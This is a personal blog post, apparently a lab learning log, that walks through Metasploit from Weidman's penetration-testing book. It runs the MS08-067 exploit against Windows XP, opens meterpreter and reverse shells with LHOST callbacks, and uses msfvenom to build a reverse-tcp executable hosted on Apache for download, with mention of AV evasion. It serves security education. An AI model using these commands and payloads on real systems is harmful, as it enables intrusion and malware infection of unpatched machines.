So you're probably wondering, why pen testing? What does pen testing have to do with forensics? There are myriad of situations that will require the assistance of an incident responder, and a remote malicious actor is one of them. When you respond to an incident involving a malware infection, it's vital to analyze its behavior after it has infected the system, to competently explain what level of access the infection was able to accomplish. After all, the blue team is the response team. But since it is one of the job descriptions of a blue teamer, to respond to a possible hack, it only makes sense to educate yourself in understanding how a hack takes place. Lets go back to the malware forensics example. Malware incident responders are interested in figuring out how the malware found its way into your system, and how it behaved once it infected your system. You can determine the answers to these questions, and many more questions, just by analyzing the malware itself dynamically. But there are so many ways in which a malicious actor can infect a system. E-mail, messaging clients, removable drives, cloud synchronization, drive by downloads, etc.. So by learning about the techniques used by hackers, and how they use malware gain access to a system, aren't we better preparing ourselves when responding to an incident, and are asked, how did this happen? Technically, learning pen testing techniques will Ibenefit a network security analyst more than a forensic analyst. If you were to anti forensic techniques, that would be one thing. But there is a reason why these two fields of information security have been separated. They both have separate goals and objectives, but will also have certain areas of information that will overlap. Besides, i'm interested in all areas of computer security.
"Penetration Testing: A Hands-on Introduction to Hacking", by Georgia Weidman, is a great introduction into the methods of penetration testing and security reconnaissance. It is perfect for those who'd like to learn some basic information on how to audit a network, the fundamental steps of hacking, and some basics of software exploitation. What's great about a book like this, is it teaches you about the material, while also acting as a step by step guide, to help you enforce what you are learning. Similar to a classroom environment, it teaches you the mechanics of a targeted environment, then how to use particular tools, while briefly explaining their purposes and functionalities. Kinda like Brian Carrier's book, "File System Forensic Analysis", where he presents a few step by step examples on how to use the Sleuth Kit and Autopsy. But in Carrier's book, a solid 70 percent of it explains the technologies associated with the operating systems, and about 30 percent on the TSK tools, and how they relate to forensics.
To give a bit of a heads up, if you choose to follow along with her book, there's a lot of pages dedicated to installations of programs, and target installations. I ran into some issues here and there, but in the end, i was able to get everything working accordingly. Working on this stuff alone, while running into issues, can certainly set you back on the clock. Some things i remained stuck on for a a month or more :(. But this is how a lot of my experiences have gone, when trying to run certain programs, while following along with either a pentesting or forensics book.
For example, after instilling Kali Linux 2016, i needed to install the android sdk via sudo apt get, and while attempting to run the android emulator, got nothing but failed attempts. Seriously, it took me a veryyyyy long time in order to continue on with you projects, simply because i couldn't get the damn thing to run. Luckily, i ran across a simple fix online, after months of searching, and found Kali 2016 required certain dependencies in order to run the sdk. I posted on my twitter a while back, but here is the list:
I don't know how or why this allowed it to run, all i know is that it took a long time, and hell of a lotta luck to find online. I'm sure there was some method to the madness, but right now i can't remember how i came to that conclusion. So make sure you install this architecture before installing the android sdk.
Also, when trying to run Metasploit in Kali 2016, against a Win XP target machine SP3, i kept getting an error after typing the "exploit" command. The error message was, "Exploit completed, but no session was created". I had a screen shot of this error, but i sadly deleted it. Well come to find out, the Version of SP3 i was running, had updates and service patches that were issued since 2015. These updates and patches were too recent in order to use the NETAPI exploit i was trying to use, via the textbook. So make sure if you are trying to go along with the book, you have an XP that has service patches no later than 2013.
Metasploit Introduction
Normally when trying to run Metasploit on say an Ubuntu system, you'll need to install Ruby, PostgreSQL, the Metasploit framework, and i'm sure a couple other dependencies i cannot think of at the moment. In Kali 2016, there is simply a Metasploit icon in your favorites bar, that starts your PostgreSQL database and msfconsole for you, along with other services that are required to initiate Metasploit. Kali has made it very convenient for us to start up all the necessary programs in metasploit. Whereas in the past, we would have to start each one of these services individually.
PostgreSQL is just a database that will be installed on your system when it is ran for the first time, and will keep track of all of your targets and scans that you're using. You can list your existing "targets", by issuing the 'workspace' command inside msf.
When it comes to interfaces, msf is the primary interface to be used, and is automatically ran in a shell when you press the metasploit icon in the favorites bar of Kali Linux. There are other interfaces i will simply mention but not go into detail: msfcli=which is a command line interface that isn't even available anymore i don't think. then there is Armitage, which provides a GUI interface.
Before i move on to the testing, there are a few terms i would like to go over that you will see mentioned frequently when using metasploit.
- Payload modules: The payload is the code that will execute once you have found a vulnerability in a system through an exploit. Ex: meterpreter shell, trojans a.k.a RAT's, key loggers, etc. There can be multiple payloads administered through a single exploit. There are payloads that you can search for inside of the msf console, that have already been developed by metasploit contributors. You will have to search the framework
- Exploit modules: The piece of code that is created to take advantage of a vulnerability found in a system, app, or network. An exploit is why makes it possible to deliver a payload to an exploited system. Ex: The Conficker worm exploited a vulnerability in the netapi32.dll via SMB. You can choose from the list of exploits made available through the Metasploit framework by searching for them by typing show exploits. Once you have used an exploit against a vulnerability and have gained access to drop a payload, the exploit then become irrelevant.
- Auxiliary modules: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, etc. Ex: nmap.
- Encoder modules: Are used to obfuscate payload and exploit modules from being detected by anti viruses and firewalls.
How do we know what exploit modules will work?
So we have an IP address, and after some scanning with either nap or tcp scanner, we know what version OS the target is using, and its MAC address. We have about 3,000 modules, and we can view them buy issuing the show command (ex: show exploits, show payloads, etc..). In order to know what patches are missing from our target machine, we have to supply the IP address of out target to an Nmap scan. There are a lot of port scanning tools out there that will give you some starting information to work with. Nmap and Nessus are your two best options. (Nmap is used to identify ports and hosts inside of the network, while Nessus is generally the go to tool for discovering the vulnerabilities). Not only will you get a patch level assessment with scans like these, but you will also be able to ascertain the level of security controls that are put in place. Also, the amount of information you will be able to collect will depend on whether you are performing an internal or external scan. with an internal scan, you are able to collect more information of course, but security controls can make it difficult to perform such an assessment. Georgia Weidmans Intro to hacking does over vuln scanning with Nessus later on, i just wanted to quickly mentions how a vulnerability is discovered before turning to Metasploits library of exploits.
So, once you have discovered a vulnerability in a system after running a Nessus scan at a targeted IP address, you see a vulnerability it is listing that exists within the targets system, (ex: MS08-067):
https://jasonrodlund.wordpress.com/using-metasploit-for-ms08-067/ |
This photo of a Nessus scan, displaying vulnerabilities on a target system, isn't one of my screenshots. I'm postponing using my own Nessus account for the moment, since Georgia has exercises for these scans later on in the book.
So we see a Vulnerability which has been called n "MS08-067 patch" by the Microsofts security bulletin. The MS08-067 is the patch name, while it vulnerability is of the netapi32.dll. We can search for exploits that will work with this vulnerability via https://www.rapid7.com/db/modules/, as shown below:
And as you can see, there is already a prebuilt constructed module that works as an exploit against this ms08-067 vulnerability. (exploit/windows/smb/ms08_067_netapi).
You can also search for prebuilt modules that work with against this vulnerability by using the built in search engine, inside of the msf console. Simply type 'search ms08-067', and the output shows you a matching module name that will work against this vulnerability:
So this is clearly the module we will want to use when "setting" an exploit directed to our target IP. To make sure that we can use this module against our Target IP (make sure this module is compatible with or targets OS version, type 'info exploit/windows/smb/ms08_067_netapi':
Since i can't list the entire commands output, just trust me that it lists some valuable basic information, including information about the exploit, and a list of OS targets i is eligible for, which in our case, we see listed an Windows XP SP3 English (NX). This module has 66 other possible OS targets.
Now lets set Metasploit to use this module, so we can then target it toward or Targets IP, and send it some payload code. Type 'use windows/smb/ms08_067_netapi':
We now have our exploit loaded. But before we can move on, we need to supply some additional information to this exploit, to tell it where it is going. You can see these options by typing 'show options':
- RHOST: Is the IP address of the target system we intend to send this exploit to. You will have to type: 'set RHOST xxx.xxx.xx.xx'.
- RPORT: refers to what port the exploit is sent over. With this exploit, by default, it uses the SMB protocol which is port 445. So once you send the exploit, it will open this port. 'set RPORT xxx'. But leave alone, and the exploit will use the default settings.
- SMBPIPE: This is an auxiliary module that is used to scan for open SMB protocols within the target system to help it determine what version OS is running, (i think).
- Exploit Target: By default, this setting is set to 0, which allows metaploit to determine the target automatically. There is a list from 0-65+, listing different version of operating systems to choose from. You choose what version OS your target is. If left 0, it checks automatically. You can see this list by typing 'show targets', and keep in mind, all the OS's that are listed, are operating systems that are vulnerable to this exploit.
Finding a compatible Payload
At this point you're probably wondering, ok, so what about the payload?? We need to tell our exploit what to do, once the exploit has successfully accessed the target system. Metasploit will usually choose without asking the best matching payload, but, we can manually assign and choose from the plethora of payloads to choose from. Don't forget, Metasploit has a modular design, and we can mix and match exploit with different payloads as we see fit. But be careful, because some payloads are more intrusive on a system, and may cause a crash.
There is over 300 different payloads, and not all of them are compatible with our specific exploit. You can view the payloads that are compatible with the ms08_067_netapi exploit by typing 'show payloads', and you will see a list of injections, and reverse shells that are all usable once you've exploited the system. Otherwise, the exploit module will just choose a default payload. But you should get into the habit of choosing a payload manually.
Run the ms08_067_netapi against a Win XP SP3 machine
After leaving the default payload as is, type 'exploit'. (I should mention, make sure your target XP machine has all the configurations that were directed in Weidman's book, and make sure your firewall is turned off):
Here we popped a meterpreter shell on the target machine. A meterpreter shell doesn't create a new process, instead it runs inside the address space of the exploited process. You can do a lot of damage with a meterpreter shell, especially if it has root level access. Here we only have system level access :(. As far as what kind of sensitive information we can extract with this access, i'll save for later. This shell comes with a list of commands (tools) that allow you to do all sorts of things. Simply type 'help', and you will see these commands. Ex: key loggers.
Now lets run a reverse shell, with metapsloit. We will use the 'set payload windows/shell_reverse_tcp' payload we saw earlier when we listed the payloads for this exploit. Usually you will find yourself using a reverse shell when the targets system has firewall restrictions in place, and your only option is open a listener on your attack machine, connect to the target machine via the exploit, then have the payload force the target machine to push back a shell to your target, that you will be able to control from your attack machine, as if you were sitting in front of the target machine with a shell open. Kinda like a netcat connection. 'set RHOST' to the ip address of the target machine, and 'set LHOST' to the IP address of the attack machine, since this is a reverse shell, and we want the target to know where to send back the shell:
Here we can see our reverse shell available for us on our attack machine.
I'm going to finish up this metasploit introduction with a quick run through with Msfvenom. This is a program that combines msfpayload and msfencode. I'm assuming this means it combines the metasploit payloads with an encoding utility. Why would you want to encode payloads you ask? Well you can use it to re-encode already existing payloads to help prevent against AV detection. It changing the encoding of the malicious executable, to avoid some of the common detection techniques used. Once the executable is changed, it will run like any other metasploit payload after it has accomplished the exploitation phase. This malicious executable will need to be run from user intervention, so this is where social engineering techniques come into play, or by compromising an active server.
You control Msfvenom from the root@kali:~# directory, and it is here where you will create your malicious executable. I'm having a bit of trouble with some of the commands in msfvenom, but for now, these are the best results i was able to accomplish:
Set our LHOST to our Kali IP address, so our exploit knows what to connect back to. We will also set our connecting port to LPORT=12345. This can all be accomplished in one line: 'msfvenom -p windows/meterpreter/reverse_tcp LHOST= 192.168.xxxxx LPORT=12346 -f exe > chapter4example.exe'. This creates the executable. You can view a description of the exe with the file command. Here is the output so far:
You can see the PE file format of a Windows executable, along with some errors i'm not going to try and figure out at the moment. If you now go to your XP target machine and browse to http://192.168.xxx/chapter4example.exe, and download the file, you will have successfully infected your target XP machine.
Since our Kali Linux machine can host as an Apache web server, we can offer this file online to those who are "willing" to visit our domain, and download the malicious file.
First we need to copy or newly created exe to our Kali /var/www directory: 'cp chapter4example.exe /var/www', press enter, then type 'service apache2 start':
(Update)
For now, i'm unable to get Msfvenom to run correctly. I followed everything correctly, but i cannot access the downloadable malicious file from my target machine, with kali hosting it in apache. I get this error when i enter the IP address in the url:
If i were to have successfully set this up, once i had encoded the payload, hosted it from a server, and have the user click and download the file, i would have assigned the Multi/Handler module before hand, and had a reverse shell once the target downloaded the file. (while evaded an AV).
For now i am moving on. I may come back to Msfvenom, but i have spent too much time on it already.